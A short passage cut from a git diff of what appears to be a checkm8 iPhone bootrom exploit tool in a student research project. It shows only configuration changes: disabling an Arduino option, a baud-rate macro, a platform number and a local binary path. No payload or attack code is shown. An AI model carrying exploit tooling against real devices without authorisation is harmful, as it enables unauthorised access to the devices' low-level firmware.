desc->iSerialNumber, serial_buf, len); +#endif } \ No newline at end of file diff --git a/include/checkm8_config.h b/include/checkm8_config.h index e747eea..3707157 100644 --- a/include/checkm8_config.h +++ b/include/checkm8_config.h @@ -3,9 +3,9 @@ //#define LIBUSB_LOGGING #define CHECKM8_LOGGING -#define WITH_ARDUINO +//#define WITH_ARDUINO #define ARDUINO_DEV "/dev/ttyACM0" -#define ARDUINO_BAUD B115200 +#define ARDUINO_BAUD 115200 #define CHECKM8_PLATFORM 8010 #define CHECKM8_BIN_BASE "/home/grg/Projects/School/NCSU/iphone_aes_sc/checkm8_tool/checkm8_remote/bin/"